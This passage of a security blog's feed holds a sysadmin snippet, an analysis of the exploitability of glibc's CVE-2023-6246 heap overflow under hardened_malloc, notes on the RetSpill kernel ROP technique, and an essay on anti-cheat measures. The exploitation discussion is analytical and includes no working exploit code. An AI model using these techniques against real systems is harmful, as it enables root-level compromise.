<span class="go">4 unavailable, 0 stale; 30 distinct packages available</span>
<span class="gp"># </span>^D
<span class="go">root@pve ~ lxc-attach -n 122 </span>
<span class="gp"># </span>apk<span class="w"> </span>update<span class="p">;</span><span class="w"> </span>apk<span class="w"> </span>upgrade
<span class="go">fetch https://dl-cdn.alpinelinux.org/alpine/v3.18/main/x86_64/APKINDEX.tar.gz</span>
<span class="go">fetch https://dl-cdn.alpinelinux.org/alpine/v3.18/community/x86_64/APKINDEX.tar.gz</span>
<span class="go">v3.18.6-10-g1bb71e18dfb [https://dl-cdn.alpinelinux.org/alpine/v3.18/main]</span>
<span class="go">v3.18.6-9-g41de282e84d [https://dl-cdn.alpinelinux.org/alpine/v3.18/community]</span>
<span class="go">OK: 20069 distinct packages available</span>
<span class="go">OK: 10 MiB in 30 packages</span>
<span class="gp"># </span>^D
<span class="go">root@pve 16:58 ~ </span>
</code></pre></div>
<p>tl;dr: <code>lxc attach -n 123</code> instead of <code>pct enter 123</code></p></content><category term="sysadmin"></category></entry><entry><title>Musings on CVE-2023-6246 on hardened_malloc</title><link href="https://dustri.org/b/musings-on-cve-2023-6246-on-hardened_malloc.html" rel="alternate"></link><published>2024-01-31T02:00:00+01:00</published><updated>2024-01-31T02:00:00+01:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2024-01-31:/b/musings-on-cve-2023-6246-on-hardened_malloc.html</id><summary type="html"><p>Qualys' <s>security team</s> Threat Research Unit <a href="https://seclists.org/oss-sec/2024/q1/68">published</a>
a couple of hours ago a linear two-step heap buffer overflow in glibc's
<code>syslog()</code>:</p>
<div class="codehilite"><pre><span></span><code><span class="mi">206</span><span class="w"> </span><span class="n">buf</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">malloc</span><span class="w"> </span><span class="p">((</span><span class="n">bufsize</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="k">sizeof</span><span class="w"> </span><span class="p">(</span><span class="kt">char</span><span class="p">));</span>
<span class="p">...</span>
<span class="mi">213</span><span class="w"> </span><span class="n">__snprintf</span><span class="w"> </span><span class="p">(</span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="n">l</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span>
<span class="mi">214</span><span class="w"> </span><span class="n">SYSLOG_HEADER</span><span class="w"> </span><span class="p">(</span><span class="n">pri</span><span class="p">,</span><span class="w"> </span><span class="n">timestamp</span><span class="p">,</span><span class="w"> </span><span class="o">&amp;</span><span class="n">msgoff</span><span class="p">,</span><span class="w"> </span><span class="n">pid</span><span class="p">));</span>
<span class="p">...</span>
<span class="mi">221</span><span class="w"> </span><span class="n">__vsnprintf_internal</span><span class="w"> </span><span class="p">(</span><span class="n">buf</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">l</span><span class="p">,</span><span class="w"> </span><span class="n">bufsize</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">l</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="n">fmt</span><span class="p">,</span><span class="w"> </span><span class="n">apc</span><span class="p">,</span>
<span class="mi">222</span><span class="w"> </span><span class="n">mode_flags …</span></code></pre></div></summary><content type="html"><p>Qualys' <s>security team</s> Threat Research Unit <a href="https://seclists.org/oss-sec/2024/q1/68">published</a>
a couple of hours ago a linear two-step heap buffer overflow in glibc's
<code>syslog()</code>:</p>
<div class="codehilite"><pre><span></span><code><span class="mi">206</span><span class="w"> </span><span class="n">buf</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">malloc</span><span class="w"> </span><span class="p">((</span><span class="n">bufsize</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="k">sizeof</span><span class="w"> </span><span class="p">(</span><span class="kt">char</span><span class="p">));</span>
<span class="p">...</span>
<span class="mi">213</span><span class="w"> </span><span class="n">__snprintf</span><span class="w"> </span><span class="p">(</span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="n">l</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span>
<span class="mi">214</span><span class="w"> </span><span class="n">SYSLOG_HEADER</span><span class="w"> </span><span class="p">(</span><span class="n">pri</span><span class="p">,</span><span class="w"> </span><span class="n">timestamp</span><span class="p">,</span><span class="w"> </span><span class="o">&amp;</span><span class="n">msgoff</span><span class="p">,</span><span class="w"> </span><span class="n">pid</span><span class="p">));</span>
<span class="p">...</span>
<span class="mi">221</span><span class="w"> </span><span class="n">__vsnprintf_internal</span><span class="w"> </span><span class="p">(</span><span class="n">buf</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">l</span><span class="p">,</span><span class="w"> </span><span class="n">bufsize</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">l</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="n">fmt</span><span class="p">,</span><span class="w"> </span><span class="n">apc</span><span class="p">,</span>
<span class="mi">222</span><span class="w"> </span><span class="n">mode_flags</span><span class="p">);</span>
</code></pre></div>
<p>the tl;dr is that <code>bufsize</code> is <code>0</code> while <code>l</code> is user-controlled.
As mentioned in the advisory, messing with nss structures as done
in their (phenomenal) <a href="https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt"><code>Baron Samedit</code> sudo
exploit</a>
is a good way to get a root shell on the glibc.</p>
<p>While the bug is in glibc's <code>syslog</code>, it's not unheard of for
people to run custom allocators for performance/security/speed/… reasons.
One of those could be, for example, <a href="https://github.com/GrapheneOS/hardened_malloc">hardened_malloc</a>,
<a href="https://grapheneos.org">GrapheneOS</a>'s security-focused allocator, raising
the question "would <code>hardened_malloc</code> make this particular bug
unexploitable on my x86_64 Debian machine?"</p>
<p>After discussing this with friends, we don't <em>think</em> that it makes
the bug completely unexploitable, but ridiculously complicated, which is good
enough™ for me. But keep in mind that this "analysis" was done hastily at 2am,
so caveat lector.</p>
<p><code>hardened_malloc</code> uses size-based slabs isolation, popularised by
<a href="https://chromium.googlesource.com/chromium/src/+/master/base/allocator/partition_allocator/PartitionAlloc.md">PartitionAlloc</a>.
Since <code>bufsize</code> is zero, this is a 1-byte
allocation, falling into the
<a href="https://github.com/GrapheneOS/hardened_malloc/blob/main/h_malloc.c#L147">16 bytes size-class</a>,
the smallest after the special <code>0</code> one. So to exploit this, one would have to find an
interesting object of size 16 bytes or lower to overwrite. But since
canaries are enabled by default, this becomes even more difficult: sizes of
allocations are actually bumped by 8 bytes, meaning that one would actually
have to find an interesting object of size 8 bytes or lower.</p>
<p>Moreover, 16-byte slabs can contain at most 256 allocations, and are
surrounded by guard pages, meaning that accessing anything below <code>buf</code> and
above <code>buf+(256*16)</code> will result in a crash.</p>
<p>Allocations are randomized, which might help for bruteforcing the heap layout:
if the current one isn't exploitable, just crash and start again. But it will
also result in a lot more crashes, since <code>buf</code> might be allocated closer to
the guard page.</p>
<p>There are of course other mitigations, but they aren't relevant in this
particular case, like canaries that are checked on <code>free</code>,
or <a href="https://community.arm.com/arm-community-blogs/b/architectures-and-processors-blog/posts/enhanced-security-through-mte">ARM's MTE</a> that completely kills linear-overflows.</p>
<p>Given the ludicrous amount of randomization <code>hardened_malloc</code> applies to heap bases (32G
per region), bruteforcing offsets of anything not on the heap is futile.
So one would have to find something interesting in an object of 8 bytes or less on
the heap, like a path to corrupt as in <code>service_user</code>,
or some partial-overwrite of a function-pointer to call a
<a href="https://david942j.blogspot.com/2017/02/project-one-gadget-in-glibc.html">one-shot-gadget</a>, …</p>
<p>Thanks to <code>strcat</code> for the handholding, and
to <code>jdoe</code>, <code>drvink</code> and <code>J</code> for their diligent proofreading,</p></content><category term="security"></category></entry><entry><title>Paper notes: RetSpill</title><link href="https://dustri.org/b/paper-notes-retspill.html" rel="alternate"></link><published>2024-01-18T16:45:00+01:00</published><updated>2024-01-18T16:45:00+01:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2024-01-18:/b/paper-notes-retspill.html</id><summary type="html"><ul>
<li>Full title: RetSpill: Igniting User-Controlled Data to Burn Away Linux Kernel Protections</li>
<li>PDF: <a href="https://dl.acm.org/doi/10.1145/3576915.3623220">ACM</a> —
<a href="https://kylebot.net/papers/retspill.pdf">mirror</a> —
<a href="https://dustri.org/b/files/papers/retspill.pdf">local mirror</a></li>
<li>Authors: <a href="https://kylebot.net/">Kyle "kylebot" Zeng</a>,
<a href="https://ruoyuwang.me/">Ruoyu Wang</a>,
<a href="https://yancomm.net/">Yan Shoshitaishvili</a>,
and <a href="https://adamdoupe.com/">Adam Doupé</a> from <a href="https://shellphish.net/">Shellphish</a>,
along with <a href="https://zplin.me/">Zhenpeng Lin</a>,
<a href="https://www-users.cse.umn.edu/~kjlu/">Kangjie Lu</a>,
<a href="http://xinyuxing.org/">Xinyu Xing</a> and
<a href="https://www.tiffanybao.com/">Tiffany Bao</a>.</li>
</ul>
<p>The idea of the paper is to use user-controlled …</p></summary><content type="html"><ul>
<li>Full title: RetSpill: Igniting User-Controlled Data to Burn Away Linux Kernel Protections</li>
<li>PDF: <a href="https://dl.acm.org/doi/10.1145/3576915.3623220">ACM</a> —
<a href="https://kylebot.net/papers/retspill.pdf">mirror</a> —
<a href="https://dustri.org/b/files/papers/retspill.pdf">local mirror</a></li>
<li>Authors: <a href="https://kylebot.net/">Kyle "kylebot" Zeng</a>,
<a href="https://ruoyuwang.me/">Ruoyu Wang</a>,
<a href="https://yancomm.net/">Yan Shoshitaishvili</a>,
and <a href="https://adamdoupe.com/">Adam Doupé</a> from <a href="https://shellphish.net/">Shellphish</a>,
along with <a href="https://zplin.me/">Zhenpeng Lin</a>,
<a href="https://www-users.cse.umn.edu/~kjlu/">Kangjie Lu</a>,
<a href="http://xinyuxing.org/">Xinyu Xing</a> and
<a href="https://www.tiffanybao.com/">Tiffany Bao</a>.</li>
</ul>
<p>The idea of the paper is to use user-controlled data that are by design copied
in kernel-land when exercising syscalls to store a <a href="https://en.wikipedia.org/wiki/Return-oriented_programming">ROP</a>-chain, via 4 main venues:</p>
<ul>
<li>Valid Data directly copied onto the kernel stack for performance reasons, like when
calling <code>poll</code>;</li>
<li>Preserved Registers, restored upon returning from kernel-land to
userland. </li>
<li>Calling Convention compliant functions will save/restore registers, and
apparently, system call handlers are calling convention compliant
even though the kernel is already taking care of those,
and syscalls can <a href="https://www.kernel.org/doc/html/latest/process/adding-syscalls.html?highlight=syscall_define#do-not-call-system-calls-in-the-kernel">only be called from userland</a>.
But even if the syscalls handles weren't compliant, registers still contain
userland values when they're called, and sub-functions might store/restore
those registers, since those do need to be compliant.</li>
<li>Uninitialized Memory, since the per-thread kernel stack is reused between syscalls,
and not erased (unless <code>PAX_MEMORY_STACKLEAK</code> is used).</li>
</ul>
<p>Then, only a <a href="https://en.wikipedia.org/wiki/KASLR">KASLR</a> leak,
a CFHP (control-flow hijacking primitive)
and a <code>add rsp, X; ret</code>-like gadget are required to <a href="https://www.youtube.com/watch?v=FoUWHfh733Y">ROP all the things</a>.
Nowadays, most™ CFHP are created by corrupting the heap to hijack function
pointers, and since every kernel thread shares the same heap,
once it is is properly shaped, the control flow hijacking primitive can likely
be triggered again and again from a different threads.
Moreover, changing the exploit is simply a matter of re-invoking a syscall with
different data spill, instead of having to reshape the heap every single time.
One doesn't have to worry about crashes (enabling lame bruteforcing), since no
major Linux distributions (except CentOS, kudos) has <code>panic_on_oops</code> enabled,
so having a ROP-chain crash is no big deal, because the CFHP is still on the
heap, one syscall away.</p>
<p>Since the space afforded to store gadgets might be too small, one trick is to
invoke <code>do_task_dead</code> at the end of every ROP-chain to terminate it gracefully,
and trigger the CFHP again and again.</p>
<p>Mitigation-wise: </p>
<ul>
<li><a href="https://en.wikipedia.org/wiki/Control_register#SMEP">SMEP</a>,
<a href="https://en.wikipedia.org/wiki/Supervisor_Mode_Access_Prevention">SMAP</a> and
<a href="https://en.wikipedia.org/wiki/Kernel_page-table_isolation">KPTI</a> are irrelevant.</li>
<li><a href="https://pax.grsecurity.net/docs/randkstack.txt">RANDKSTACK</a> mitigates data spillage from Preserved Registers and Uninitialized Memory,
but since it only provides 5 bits of randomness, a <code>ret</code>-sled is enough
to bypass it (25.44% of the time if using gadgets from Preserved Registers or Uninitialized Memory, 100% otherwise),
and in the absence of <code>panic_on_oops</code> it can quickly be bruteforced anyway.</li>
<li><a href="https://en.wikibooks.org/wiki/Grsecurity/Appendix/Grsecurity_and_PaX_Configuration_Options#Sanitize_kernel_stack">STACKLEAK</a>,
<a href="https://en.wikibooks.org/wiki/Grsecurity/Appendix/Grsecurity_and_PaX_Configuration_Options#Forcibly_initialize_local_variables_copied_to_userland">STRUCTLEAK</a>,
and <a href="https://lwn.net/Articles/823152/">CONFIG_INIT_STACK_*</a>
only mitigate data spillage from Uninitialized Memory.</li>
<li><a href="https://lwn.net/Articles/824307/">FG-KASLR</a> is <a href="https://lkmidas.github.io/posts/20210205-linux-kernel-pwn-part-3/#gathering-useful-gadgets">useless</a>
since it doesn't randomize everything, leaving a couple (<code>42631</code> according to
the paper) of gadgets at position-invariant positions, which are enough to perform
arbitrary-reads and derandomize everything.</li>
<li><a href="https://lore.kernel.org/lkml/202210010918.4918F847C4@keescook/T/#u">KCFI</a>
and <a href="https://www.intel.com/content/www/us/en/developer/articles/technical/technical-look-control-flow-enforcement-technology.html">IBT</a>
also (currently) don't cover everything, but don't really matter much here
anyway, since we only care about backward-edges, and as for the CFHP:</li>
<li>There <a href="https://i.blackhat.com/USA-22/Wednesday/US-22-Jin-Monitoring-Surveillance-Vendors.pdf#page=35">are ways</a>
to obtain one in the presence of perfect forward-edge CFI with a heap corruption.</li>
<li>Using <code>__x86_indirect_thunk_rdi</code> allows to transform a forward-edge control-flow transition to backward edge one.</li>
<li>Shadow stack and perfect CFI are a pipe dream that would mitigate RetSpill,
but <a href="https://pax.grsecurity.net/docs/PaXTeam-H2HC15-RAP-RIP-ROP.pdf">PaX' RAP</a>
is really close to it, likely making it insanely hard, with its type-based
CFI, and its changing-on-every-syscall/task/… register-stored cookie paired
with unreadable kernel stacks for backward edge, on top of CFI.</li>
</ul>
<p>To showcase how cool all of this is, the paper comes with a semi-automated tool
outputting the address of a stack-shifting gadget, a function to performs data
spillage, invoke the triggering system call, and yield a root shell via a
classic <code>commit_creds(init_cred)</code> + returning back to user space. It works by:</p>
<ul>
<li>taking full snapshots of a vm to locate the syscall leading to CFHP by using
a binary-search-like heuristic;</li>
<li>mutating userland inputs (registers, <code>copy\_from\_user</code>/<code>get\_user</code>
parameters, …), continuing the execution of the vm,
marking the as user-controllable data if the CFHP still
happens after modifications, and doing taint analysis to find how to modify
them.</li>
<li>generating a ROP-chain, which isn't that easy, given that:</li>
<li>it's done over discrete controlled regions</li>
<li>there are some constraints, like "<code>eax</code> contains the syscall number",
or "<code>edx</code> comes from both <em>Saved Registers</em> and <em>Calling Convention</em>
spillages.</li>
</ul>
<p>Of course, given that some authors are <a href="https://angr.io/">angr</a> developers,
<a href="https://github.com/angr/angrop">angrop</a> was used to knit the ROP-chains, and
the results are pretty impressive:</p>
<blockquote>
<p>The abundance of data spillage allows 20 out of 22 proof-of-concept programs
that manifest CFHP to be semi-automatically turned into full privilege escalation exploits.</p>
</blockquote>
<p>To kill this technique, the authors suggest:</p>
<ol>
<li><em>Preserved Register</em>: <code>RANDKSTACK</code> helps, but storing userspace registers
somewhere else than on the stack would be even better, eg. in <code>task_struct</code>.</li>
<li><em>Uninitialized Memory</em>: enable <code>STACKLEAK</code>/<code>STRUCTLEAK</code>/<code>CONFIG\_INIT\_STACK\_\*</code>,
but the performances impact is pretty steep.</li>
<li><em>Calling Convention</em> and <em>Valid Data</em>: an improved version of <code>RANDKSTACK</code>,
adding a random offset at the bottom of each stack frame, between <code>rsp</code> and user data.
This technique also mitigates Preserved Registers and Uninitialized Memory,
with an average performance overhead of 0.61%.</li>
</ol>
<p>Like all good papers it comes <a href="https://github.com/sefcom/RetSpill">with code</a>.</p>
<p>Amusingly:</p>
<ul>
<li>RetSpill completely bypasses OpenBSD's
<a href="https://isopenbsdsecu.re/mitigations/map_stack/">MAP_STACK</a> mitigation,
should it ever be implemented in kernel-land, </li>
<li>The <a href="https://org.anize.rs/">Organizers</a> CTF team
<a href="https://org.anize.rs/0CTF-2021-finals/pwn/kernote">used</a>
the <a href="https://elixir.bootlin.com/linux/latest/ident/pt_regs"><code>ptregs</code></a> structure
to store their ROP chain for <a href="https://ctftime.org/event/1357">0CTF/TCTF 2021
Finals</a>'s
<a href="https://ctftime.org/task/17461">Kernote</a> pwn challenge.</li>
</ul></content><category term="paper_notes"></category></entry><entry><title>On non-technical video-games cheat mitigations</title><link href="https://dustri.org/b/on-non-technical-video-games-cheat-mitigations.html" rel="alternate"></link><published>2024-01-12T20:15:00+01:00</published><updated>2024-01-12T20:15:00+01:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2024-01-12:/b/on-non-technical-video-games-cheat-mitigations.html</id><summary type="html"><p>Cheats are as old as video games, and will be there as long. There
are a couple of high-profile players in the anti-cheat market today:
<a href="https://en.wikipedia.org/wiki/BattlEye">BattlEye</a>,
<a href="https://en.wikipedia.org/wiki/Valve_Anti-Cheat">Valve's VAC</a>,
<a href="https://en.wikipedia.org/wiki/PunkBuster">PunkBuster</a>,
<a href="https://easy.ac/en-us/">Epic's EAC</a>,
<a href="https://wowpedia.fandom.com/wiki/Warden_(software)">Blizzard's Warden</a>,
<a href="https://support-valorant.riotgames.com/hc/en-us/articles/360046160933-What-is-Vanguard-">Riot's Vanguard</a>,
<a href="https://callofduty.com/en/warzone/ricochet">Activision's Ricochet</a>,
… as well as in-house ones.</p>
<p>To try to keep up in the race …</p></summary><content type="html"><p>Cheats are as old as video games, and will be there as long. There
are a couple of high-profile players in the anti-cheat market today:
<a href="https://en.wikipedia.org/wiki/BattlEye">BattlEye</a>,
<a href="https://en.wikipedia.org/wiki/Valve_Anti-Cheat">Valve's VAC</a>,
<a href="https://en.wikipedia.org/wiki/PunkBuster">PunkBuster</a>,
<a href="https://easy.ac/en-us/">Epic's EAC</a>,
<a href="https://wowpedia.fandom.com/wiki/Warden_(software)">Blizzard's Warden</a>,
<a href="https://support-valorant.riotgames.com/hc/en-us/articles/360046160933-What-is-Vanguard-">Riot's Vanguard</a>,
<a href="https://callofduty.com/en/warzone/ricochet">Activision's Ricochet</a>,
… as well as in-house ones.</p>
<p>To try to keep up in the race, both sides are resorting to more and more invasive
technical privacy-invasive measures: streaming virtualised shellcodes,
hardware fingerprinting and locking,
<a href="https://secret.club/2020/01/05/battleye-stack-walking.html">stack-walking</a>,
bootkit-like kernel drivers,
<a href="https://en.wikipedia.org/wiki/Trusted_Platform_Module">TPM</a>/
secure boot/
<a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/bringup/device-guard-and-credential-guard">HVCI</a>/
<a href="https://en.wikipedia.org/wiki/Input%E2%80%93output_memory_management_unit">IOMMU</a>/
<a href="https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-vbs">VBS</a>/…
<a href="https://support-valorant.riotgames.com/hc/en-us/articles/22291331362067-Vanguard-Restrictions">shenanigans</a>,
hypervisors <a href="https://secret.club/2020/04/13/how-anti-cheats-detect-system-emulation.html">detection</a>/usage,
<a href="https://secret.club/2020/03/31/battleye-developer-tracking.html">exfiltration of suspicious materials</a>,
external <a href="https://en.wikipedia.org/wiki/Direct_memory_access">DMA</a> hardware,
or other <a href="https://dustri.org/b/paper-notes-reversing-anti-cheats-detection-generation-cycle-with-configurable-hallucinations.html">more exotic things</a>.</p>
<p>Yet anti-cheats are still routinely bypassed, less in a public manner, granted, but private
and closed-community cheats are still flourishing, since it's a losing game by
nature. And since games and anti-cheats are software, they're of course riddled
with <a href="https://vice.com/en/article/d7y5wj/street-fighter-v-rootkit">hilarious</a> bugs leading to
<a href="https://unknowncheats.me/forum/anti-cheat-bypass/614682-eac-dll-loading-method-eac-forcer.html">stupid</a>
<a href="https://unknowncheats.me/forum/anti-cheat-bypass/503052-easy-anti-cheat-kernel-packet-fucker.html">bypasses</a>.</p>
<p>But this isn't what this blogpost is about. Nowadays, cheats are considered as
part of a larger problem: abuses and toxicity. Cheats aren't (only) hunted down
because they're morally questionable, but because they disturb the way the game is meant to be
enjoyed. Toxic and abusive behaviours lead to the very same results:
A game that isn't fun to play because of cheating/abuse/toxicity issues will see its
players number decrease, have poor reviews, … and won't make money. I'm sure
there is a parallel to be made about the current state of our society, but I
digress.</p>
<p>For this article, we'll consider cheating and abuse/toxicity
as a single issue under the term <em>abuse</em>.
Now, because abuse isn't a purely technical issue, but also a social one, it
can't be solved by technical solutions only, so let's have
a look at what non-technical mitigations game developers are
coming up with to curb this issue.</p>
<p>The most obvious mitigation is to make cheating expensive, money wise.
Having to pay 60EUR for a game is a steep investment, especially if one
has to buy it again every time they get banned. This of course doesn't
apply for free-to-play games, but can be emulated by having a cosmetics
ecosystem, either to pay for, or to grind. The other expensive thing when
playing video games is the hardware, and bans can be tied to it.</p>
<h2>Global measures</h2>
<p>The <em>big</em> mitigation at this level is reputation systems. They're based on
people who know best how a fun and fair game should go: players. After a
match, they're encouraged to cast votes on how fair it was, on a match level,
but also directly at players level: "Bob was really looking out for others",
"Bob was a team player", and so on. For negative behaviour, reports don't have
to wait the end of the match, players can report
cheating, being offensive in the text/voice chat, <a href="https://en.wikipedia.org/wiki/Griefer">griefing</a>,
queue dodging, <a href="https://www.urbandictionary.com/define.php?term=smurfing">smurfing</a>, …
Of course, slanderous reports are penalised.</p>
<p>Peer pressure is a good lever too, by taking action not only against cheaters,
but from people benefiting from the cheat, like regular teammates.</p>
<p><a href="https://en.wikipedia.org/wiki/Bug_bounty_program">Bug bounty programs</a> are now commonplace,
so it's only logical that there are now <a href="https://hackerone.com/riot">some</a>
rewarding anti-cheat bypasses/exploits. The rewards are a bit cheap for now,
but will likely rise up as the programs mature. The positive effects are
multiples:</p>
<ol>
<li>It increases the incentives to report issues to get them fixed: a player
finding a glitch/exploit can now get some cash for the discovery</li>
<li>As more abuse vectors are killed, the reward prices will rise, and it might
become more profitable to report bugs than to sell them to cheat providers.
This isn't unheard of, with <a href="https://google.github.io/security-research/kernelctf/rules.html">Google's
kernelCTF</a>
paying two times more than Zerodium.</li>
<li>If the bug bounty program is correctly managed, the probability of getting a
given amount of money for reporting an issue will be higher than using it in
a cheat for an unknown period of time until it gets fixed.</li>
<li>It will likely increase the amount of people looking for issues and willing
to report them.</li>
</ol>
<p>Community managers can also regularly <s>spread <a href="https://en.wikipedia.org/wiki/Fear,_uncertainty,_and_doubt">FUD</a></s>
post updates about ban waves, anti-cheat measures, reports, … to make it
clear that abusive behaviours are something being taken care of,
and a dangerous gamble for players to take part in. I think
I have seen some people spending time proving that some cheaters streaming live
were in fact recycled pre-recorded footage from an earlier version of game,
because some of the game details have been updated in the meantime.</p>
<h2>Accounts-level measures</h2>
<p>Some game stores, like <a href="https://en.wikipedia.org/wiki/Steam_(service)">Steam</a>,
have an account-level "cheater" mark, meaning that if someone gets banned from a game for cheating,
other games can know about it. But more importantly,
<a href="https://en.wikipedia.org/wiki/Achievement_(video_games)">achievements</a>
and cosmetics are also tied to an account, and as mentioned previously,
those are non-zero time and/or money investments. Getting banned means losing
them. This of course only deters opportunistic cheaters,
as people can simply create other accounts to cheat, but this can be made
harder via purely technical means.</p>
<p>Most <em>competitive</em> online games have ranked and casual game modes, with the
former being only accessible after having spent a certain amount of time in the
latter one. Meaning that one has to do it again every time they get banned,
or <a href="https://en.wikipedia.org/wiki/Boosting_(video_games)">pay someone to do it</a>.
Some studios are even making player go through more hoops to be able to play, like requiring
<a href="https://en.wikipedia.org/wiki/Multi-factor_authentication">MFA</a>,
or playing a couple of matches against <a href="https://en.wikipedia.org/wiki/Video_game_bot">bots</a>
branded as a tutorial, before being able to play with other people. There is a
course a fine balance to keep to annoy abusers but not legitimate players.</p>
<h2>Player-level measures</h2>
<p>The goal of non-technical measures isn't to make it impossible to be abusive,
but to make it not worth it. Moreover, issuing instahwpermabans to <a href="https://en.wikipedia.org/wiki/Edgelord">edgelords</a>
seems a tad heavy-handed, so having a large panel of measures against abuser makes sense:
one might want to allow people to rectify their behaviour, to isolate them to
cool down, and so on. It might include textual warnings, temporary bans, kick
from the current game, chat/voice mute, losing access to ranked play,
reducing the amount of earned experience points, …</p>
<p>Players are abusive for various reasons, but I'd argue that most do because
it's fun. Ruining the fun for them is thus a good way to curb such behaviours.
A simple way to do this is to make them play together, by grouping players
by reputation, or by having servers with technical anti-cheat measures
explicitly disabled. But there are even more creative measures,
like <a href="https://www.callofduty.com/en/blog/2023/11/call-of-duty-ricochet-anti-cheat-modern-warfare-III-progress-report">disabling their parachute</a>,
reducing their damage output to ridiculous levels, taking away their weapons,
<a href="https://www.callofduty.com/blog/2023/06/call-of-duty-ricochet-anti-cheat-season-04-update">making other legitimate players invisible to them</a>,
randomly drop some of their inputs,
<a href="https://dustri.org/b/paper-notes-reversing-anti-cheats-detection-generation-cycle-with-configurable-hallucinations.html">hallucinations</a>, … and
while this costs a bit more engineering time than simply grouping them
together, it has a couple of high-value returns on investment:
- allowing game developers to spend more time collecting data on how cheats are working on a technical level,
- reducing the impact cheaters have on a game make is possible to
significantly defer banning them without impacting other players too much,
making it harder for cheat makers to pinpoint how and why a cheat was
detected.
- it's absolutely hilarious</p>
<h2>Examples</h2>
<h3><a href="https://en.wikipedia.org/wiki/Tom_Clancy's_Rainbow_Six_Siege">Rainbow Six Siege</a></h3>
<ul>
<li>It uses BattlEye, and in end-2022 early 2023 banned around
<a href="https://ubisoft.com/en-us/game/rainbow-six/siege/news-updates/2g7hT2NNuOqrj35RfgsFxN/anticheat-status-update-march-2023">5000</a>
accounts per month, which is a lot, but also shows that it doesn't deter
cheaters.</li>
<li>The game costs <a href="https://store.steampowered.com/app/359550/Tom_Clancys_Rainbow_Six_Siege/">$8</a>,
but if you want to have access to all the operators, it's $70. One can also
unlock operators by playing, which takes several hundreds of hours.</li>
<li>To play ranked, one need to reach <a href="https://ubisoft.com/en-gb/game/rainbow-six/siege/news-updates/4hShcX2HZTG2ttIi3IIN9Y/matchmaking-rating">level 50</a>,
which takes around 50h, give or takes.</li>
<li>The game has a rich ecosystem of cosmetics
than can be <a href="https://store.ubisoft.com/us/dlc-type-skins-cosmetics">purchased for steep prices</a>,
and painstakingly earned by playing,
that would be lost in cast of an account ban.</li>
<li>Friendly fire will result in the damages being applied to the shoot
should it be reported as voluntary by the player at the receiving end.</li>
<li>It's developing a pretty involved <a href="https://ubisoft.com/en-gb/game/rainbow-six/siege/news-updates/22JLMFeayzuamhb7YKbAjm/reputation-system-activation-more">reputation system</a>,
where people with a "positive" behaviour gets rewarded (more experience
points, cosmetics, …), while those with a "negative" one
might be prevented from playing <em>ranked</em>,
get less experience points,
…</li>
</ul>
<h3><a href="https://en.wikipedia.org/wiki/Call_of_Duty:_Modern_Warfare_II_(2022_video_game)">Call of Duty: Modern Warfare II</a>:</h3>
<ul>
<li>The game costs <a href="https://store.steampowered.com/app/1962660/Call_of_Duty_Modern_Warfare_II/">$70</a>.</li>
<li><a href="https://callofduty.com/blog/2023/02/call-of-duty-modern-warfare-II-ranked-play-features-challenges-rewards">"Players must be at least Level 16 to access Ranked Play"</a>,
but this can be done in a couple of hours.</li>
<li>Cheating results in account-wise permaban across all Call of Duty titles.</li>
<li>Banned accounts have their records purged from leaderboards.</li>
<li>Players engaging in "negative" behaviours might get
muted on chat/voice, … and interestingly, cheaters
are going to get paired with other cheaters in matchmaking.
<a href="https://support.activision.com/articles/call-of-duty-security-and-enforcement-policy">Players who are often playing with the same cheaters</a> (boosting),
will also get their reputation tanked.</li>
</ul>
<h3><a href="https://playvalorant.com/">Valorant</a></h3>
<p>Its developer even published a
<a href="https://playvalorant.com/en-us/news/tags/game-health-series/">great series of blopost</a> on
what it calls "game health"</p>
<ul>
<li>The game is free-to-play, but comes with <em>a lot</em> of <a href="https://valorantstrike.com/valorant-store/">cosmetics</a>.</li>
<li>Cheaters get a permaban, but people benefiting from them might get a 6 months one as well.</li>
<li>Players joining games and <a href="https://playvalorant.com/en-gb/news/dev/valorant-behavior-detection-and-penalty-updates/">idling to reap out experience points</a>,
doing nothing but kneecapping their team will <a href="https://playvalorant.com/en-us/news/dev/valorant-systems-health-series-afk/">get penalised</a>.</li>
<li>Players are encouraged to report toxic behaviours, and to not engage,
since engagement might be penalized as well</li>
<li>Players using,
<a href="https://support-valorant.riotgames.com/hc/en-us/articles/360044791253-Inappropriate-In-Game-Names">certain words</a>
whether in chat or as username,
will be flagged as toxic.</li>
<li>Penalties come in various size, shapes and durations, allowing to fine tune
according to behaviour: warnings, voice/chat restrictions,
reduction in experience points
gain, reduction in raked rating, increased queue waiting time, ranking game
ban, global ban.</li>
<li>Valorant <a href="https://playvalorant.com/en-us/news/dev/valorant-systems-health-series-smurf-detection/">published</a>
their approach to mitigate smurfing; acknowledging that while having multiple accounts
to smurf/trade/evade bans/… is not desirable, some people are using
them to to play with friends with a better/worse ranked level.
So while they took measures to detect and mitigate having multi-accounts,
they also relaxed the maximum ranks difference for players to play together,
which significantly reduced the number of alt-accounts usage,
but also didn't alter match fairness in a measurable way.</li>
</ul>
<h2>Conclusion</h2>
<p>This is all nice and dandy, but is it working? According to
data from <a href="https://www.ubisoft.com/en-us/game/rainbow-six/siege/player-protection">Rainbow Six Siege</a>:
